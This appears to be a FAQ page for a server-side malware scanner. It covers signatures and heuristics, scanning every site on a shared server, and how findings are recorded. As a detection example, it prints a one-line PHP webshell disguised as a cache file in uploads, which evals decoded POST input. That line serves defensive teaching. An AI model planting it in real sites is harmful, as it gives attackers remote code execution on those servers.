What is a server-side malware scan?

A server-side malware scan reads the actual files and configuration on the server, rather than loading pages from the outside like a remote scanner. It sees PHP source, hidden files, uploads and code that is only served to certain visitors, which is where most webshells, backdoors and cloaked SEO spam live.

Remote scanners and many plugins only see what a browser sees. If an injection only fires for Googlebot, or a webshell sits silently in wp-content/uploads, nothing appears on the rendered page. Running on the server removes that blind spot. For a fuller comparison, read security plugins versus server scanning.

How do signatures and heuristics work together?

Signatures catch known malware quickly and with very few false positives. Heuristics catch new or modified variants by scoring suspicious behaviour, such as layered decoding followed by eval. Attackers constantly repack the same shells, so a scanner that relies on signatures alone will miss much of what is on a compromised server.

# wp-content/uploads/2026/07/wp-cache.php (fictional)
<?php @eval(gzinflate(base64_decode($_POST['k'])));
# Heuristic flags: eval + gzinflate + base64_decode + request input + PHP in uploads

Each finding records the file path, the rule or heuristic that matched, the file hash and the modification time. That context helps separate a genuine threat from an unusual but legitimate plugin, and it gives the Forensic scan timeline something to line up against.

Why scan every site on the server?

Every site running under the same user or PHP pool can usually read and write the others' files. One outdated plugin on a forgotten site can re-infect a site you have just cleaned. Sweeping every site in one pass finds the source, not just the symptom, and stops cross-contamination between sites.

  • Staging and old copies of sites are included, not just the live domain
  • Findings are grouped per site so agencies can see which client is affected
  • Shared infections are linked, showing the same shell across several sites
  • Results feed the Harden playbooks that isolate sites afterwards

Found a skimmer or redirect on a live shop? Treat it as an active incident: see WooCommerce malware removal or get emergency help.